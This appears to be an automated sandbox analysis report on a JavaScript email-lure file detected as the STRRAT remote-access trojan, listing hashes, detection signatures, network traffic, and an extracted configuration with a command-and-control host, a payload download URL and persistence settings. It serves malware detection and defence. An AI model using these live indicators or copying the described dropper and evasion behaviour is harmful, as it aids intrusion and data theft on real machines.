Windows Analysis Report
Request For Quotation.js

Overview

General Information

Sample name: Request For Quotation.js
Analysis ID: 1532997
MD5: 6350bcd7fc5381cf37a3c3011d32d270
SHA1: 0be16c936ffbb3ed8f811da384c4629c5990d706
SHA256: 84315757f962b3883c39b1d1b583f4b7e59b0400fac2dbbcb203ff821fef7d8a
Tags: js, STRRAT, user-abuse_ch

Detection

STRRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected STRRAT
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected AllatoriJARObfuscator
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: bszhidta.txt.0.dr Malware Configuration Extractor: STRRAT {"C2 list": "harold.jetos.com:3608", "url": "http://jbfrost.live/strigoi/server/?hwid=1&lid=m&ht=5", "Proxy": "harold.jetos.com:3608", "lid": "khonsari", "Startup": "false", "Secondary Startup": "true", "Scheduled Task": "true"}
Source: http://wshsoft.company/jv/jrex.zip Virustotal: Detection: 13%
Source: Request For Quotation.js Virustotal: Detection: 14%
Source: Request For Quotation.js ReversingLabs: Detection: 15%

Software Vulnerabilities

Source: Request For Quotation.js Return value : ['"adodb.stream"']
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 4x nop then cmp eax, dword ptr [ecx+04h] 1_2_0282CAD8
Source: Joe Sandbox View IP Address: 199.232.192.209
Source: Joe Sandbox View IP Address: 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.4
Source: Joe Sandbox View JA3 fingerprint: 026e5ca865ce1f09da3a81d8a4e3effb
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: repo1.maven.org
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009E04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009E0B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000001.00000002.3042627997.0000000014ED0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009F14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://null.oracle.com/
Source: javaw.exe, 00000001.00000002.3036224528.0000000009DFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://policy.camerfirma.com0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.1740841774.0000014A21F47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1744318245.0000000705FD1000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1739880247.0000014A21D96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1739987199.0000014A21D2F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: wscript.exe, 00000000.00000003.1738126859.0000014A21E51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zipleB
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.allatori.com
Source: javaw.exe, 00000001.00000002.3036224528.000000000A19B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm
Source: javaw.exe, 00000001.00000002.3036224528.0000000009F7B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000001.00000002.3036224528.000000000A06E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: javaw.exe, 00000001.00000002.3033384553.0000000004B7B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.00000000049FE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004AB8000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004944000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004800000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com
Source: javaw.exe, 00000001.00000002.3033384553.0000000004800000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.00000000048AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar
Source: javaw.exe, 00000001.00000002.3036224528.0000000009D63000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009D95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/kristian/system-hook/releases/download/3.5/system-hook-3.5.jar.1.jarar
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000001.00000002.3036224528.0000000009F7B000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: javaw.exe, 00000001.00000002.3033384553.0000000004A4F000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004B04000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.000000000481E000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.00000000048D7000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004813000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004800000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org
Source: javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna-platform/5.5.0/jna-platform-5.5.0.jar
Source: javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/net/java/dev/jna/jna/5.5.0/jna-5.5.0.jar
Source: javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/
Source: javaw.exe, 00000001.00000002.3033384553.0000000004994000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.3033384553.0000000004830000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repo1.maven.org/maven2/org/xerial/sqlite-jdbc/3.14.2.1/sqlite-jdbc-3.14.2.1.jar
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu
Source: javaw.exe, 00000001.00000002.3036224528.0000000009FB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: unknown Network traffic detected: HTTP traffic on port 57750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57659 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57607
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57608
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57609
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57603
Source: unknown Network traffic detected: HTTP traffic on port 57924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57605
Source: unknown Network traffic detected: HTTP traffic on port 57603 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57606
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57601
Source: unknown Network traffic detected: HTTP traffic on port 57661 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57602
Source: unknown Network traffic detected: HTTP traffic on port 57918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57612 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57610
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57611
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57699
Source: unknown Network traffic detected: HTTP traffic on port 57921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57612
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57613
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57854
Source: unknown Network traffic detected: HTTP traffic on port 57776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57620
Source: unknown Network traffic detected: HTTP traffic on port 57667 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57908
Source: unknown Network traffic detected: HTTP traffic on port 57605 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57628
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57621
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57622
Source: unknown Network traffic detected: HTTP traffic on port 57922 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57750
Source: unknown Network traffic detected: HTTP traffic on port 57621 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 57895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57919
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 57610 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57916
Source: unknown Network traffic detected: HTTP traffic on port 57927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57915
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57918
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57917
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57914
Source: unknown Network traffic detected: HTTP traffic on port 57602 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57913
Source: unknown Network traffic detected: HTTP traffic on port 57938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57613 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57601 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57603 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57602 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57605 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57606 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57607 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57608 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57609 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57610 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57612 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57611 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57613 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57620 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57622 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57621 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57628 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57660 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57661 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57659 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57667 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.4:57700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57776 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57777 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57778 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57854 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57855 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57857 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57913 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57914 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57915 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:57916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57917 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57918 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57919 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:57920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57921 version: TLS 1.2
Source: unknown HTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.4:57923 version: TLS 1.2
